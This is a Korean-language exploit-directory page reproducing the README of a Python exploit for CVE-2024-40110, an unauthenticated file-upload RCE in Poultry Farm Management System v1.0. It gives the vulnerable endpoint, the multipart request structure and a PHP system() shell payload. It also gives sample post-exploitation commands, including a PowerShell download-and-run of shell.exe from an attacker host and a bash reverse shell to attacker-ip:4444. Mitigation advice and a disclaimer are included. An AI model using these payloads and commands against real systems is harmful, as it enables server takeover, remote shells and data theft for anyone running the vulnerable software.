Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-40110 — Poultry Farm Management System v1.0의 파일 업로드를 통한 인증되지 않은 원격 코드 실행을 위한 Python 익스플로잇입니다. 취약한 대상에서 임의의 시스템 명령을 실행하기 위해 PHP 셸을 업로드합니다. | Kitploit
도구/GitHubGitHub/angry-althaf/cve-2024-40110
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubangry-althaf/cve-2024-40110

CVE-2024-40110

Poultry Farm Management System v1.0의 파일 업로드를 통한 인증되지 않은 원격 코드 실행을 위한 Python 익스플로잇입니다. 취약한 대상에서 임의의 시스템 명령을 실행하기 위해 PHP 셸을 업로드합니다.

저장소 보기
7개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

가금류 농장 관리 시스템 v1.0 - RCE 익스플로잇

취약점 유형

인증되지 않은 파일 업로드를 통한 원격 코드 실행

설명

가금류 농장 관리 시스템 v1.0은 제품 업로드 기능에 치명적인 취약점을 포함하고 있습니다. 애플리케이션이 파일 업로드를 적절하게 검증 및 필터링하지 못하여, 공격자가 제품 이미지로 위장한 PHP 파일을 업로드할 수 있습니다. 업로드된 이러한 PHP 파일이 실행되어 원격 코드 실행이 가능합니다.

취약한 엔드포인트

root@kitploit:~
POST /paultry/farm/product.php or POST /farm/product.php

공격 벡터

이 취약점은 다음 방법으로 악용될 수 있습니다:

  1. 제품 업로드 엔드포인트에 POST 요청 전송
  2. 임의 명령어가 포함된 PHP 셸 파일 업로드
  3. 업로드된 파일에 접근하여 포함된 명령어 실행

요구 사항

전제 조건

  • Python 3.7+
  • requests 라이브러리
  • colorama 라이브러리 (색상 출력용)
  • 취약한 대상에 대한 네트워크 접근

설치

root@kitploit:~
pip install requests colorama

또는 모든 의존성 설치:

root@kitploit:~
pip install -r requirements.txt

사용법

기본 사용법

스크립트를 대화형으로 실행:

root@kitploit:~
python exploit.py

스크립트가 다음 정보를 요청합니다:

  1. 대상 IP 주소 - 취약한 서버의 IP 주소
  2. 대상 포트 - 포트 번호 (기본값: 80)
  3. 실행할 명령어 - 대상에서 실행할 시스템 명령어

예시

root@kitploit:~
==================================================
Interactive Backdoor Upload Tool
==================================================

Enter target IP address: 192.168.1.100
Enter target port (default: 80): 8080
Enter command to execute (default: powershell payload):
Command: whoami

==================================================
CONFIRMATION
==================================================
Target URL: http://192.168.1.100:8080
Command: whoami
Do you want to proceed? (yes/no): yes

기능

✅ 대화형 입력 - IP, 포트, 사용자 정의 명령어 입력 요청
✅ 기본값 - 편의를 위한 적절한 기본값
✅ 색상 구분 출력 - 읽기 쉬운 색상의 터미널 출력
✅ 확인 단계 - 실행 전 설정 확인
✅ 오류 처리 - 실패한 요청에 대한 우아한 오류 메시지
✅ 유연한 명령어 - 모든 셸 명령어 또는 PowerShell 페이로드 지원

일반적인 명령어

Windows 대상

root@kitploit:~
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"

Linux 대상

root@kitploit:~
bash -i >& /dev/tcp/attacker-ip/4444 0>&1

정보 수집

root@kitploit:~
whoami
id
ifconfig
hostname
pwd

기술적 세부 사항

작동 방식

  1. 파일 업로드: PHP 페이로드가 파일로 포함된 POST 요청 전송
  2. 페이로드 실행: 업로드된 PHP 파일이 /assets/img/productimages/에 저장됨
  3. 명령어 실행: PHP 파일에 접근하면 system() 함수를 통해 명령어 실행이 트리거됨
  4. 출력 검색: 스크립트가 GET 요청을 통해 출력을 가져옴

요청 구조

root@kitploit:~
POST /paultry/farm/product.php
Content-Type: multipart/form-data

category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]

페이로드 형식

root@kitploit:~
<?php system('COMMAND_HERE');?>

테스트 환경

익스플로잇은 다음 환경에서 테스트되었습니다:

  • OS: Windows 10
  • 서버: XAMPP v3.3.0
  • PHP 버전: PHP 5.6+와 호환

면책 조항

⚠️ 법적 경고

이 도구는 승인된 보안 테스트 및 교육 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다.

  • 이 익스플로잇은 소유하고 있거나 테스트에 대한 명시적 서면 허가를 받은 시스템에서만 사용하십시오.
  • 저자는 이 도구의 오용이나 이로 인한 손해에 대해 책임을 지지 않습니다.
  • 사용자는 모든 관련 법률 및 규정을 준수할 책임이 있습니다.
  • 컴퓨터 시스템에 대한 무단 접근, 수정 또는 방해는 미국 컴퓨터 사기 및 남용 법 (CFAA) 및 전 세계 유사 법률에 따라 연방 범죄입니다.

완화 조치

관리자를 위한

  1. 소프트웨어 업데이트 - 가능한 경우 보안 패치 적용
  2. 파일 업로드 검증
    • 파일 확장자 검증 (허용 목록: jpg, png, gif 등)
    • 서버 측에서 MIME 유형 확인
    • 업로드된 파일을 웹 루트 외부에 저장
    • 업로드 디렉터리에서 스크립트 실행 비활성화
  3. 구성
    root@kitploit:~
    <Directory /uploads>
        php_flag engine off
        AddType text/plain .php .phtml .php3 .php4 .php5 .phar
    </Directory>
    
  4. 접근 제어
    • 업로드를 허용하기 전에 인증 구현
    • 사용자 권한 검증
    • 속도 제한 추가
  5. 모니터링
    • 의심스러운 파일이 있는지 업로드 디렉터리 모니터링
    • 모든 업로드 시도 기록
    • 파일 무결성 검사 구현

참고 자료

  • Exploit DB: https://www.exploit-db.com/exploits/52053
  • GitHub: https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
  • Original Software: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

문제 해결

연결 거부됨

root@kitploit:~
Error: Connection refused
Solution: Verify the target IP and port are correct and the application is running

404 찾을 수 없음

root@kitploit:~
Error: Failed to upload shell. Status code: 404
Solution: The endpoint path may differ. Common paths: /farm/, /paultry/farm/

PHP 실행 안 됨

root@kitploit:~
Error: Command output is empty
Solution: PHP execution may be disabled or the file wasn't uploaded correctly

지원

문제, 질문 또는 개선 사항은 GitHub 저장소 또는 Exploit-DB 페이지를 참조하십시오.


마지막 업데이트: 2024년 12월
상태: 확인 및 테스트 완료

도구 다운로드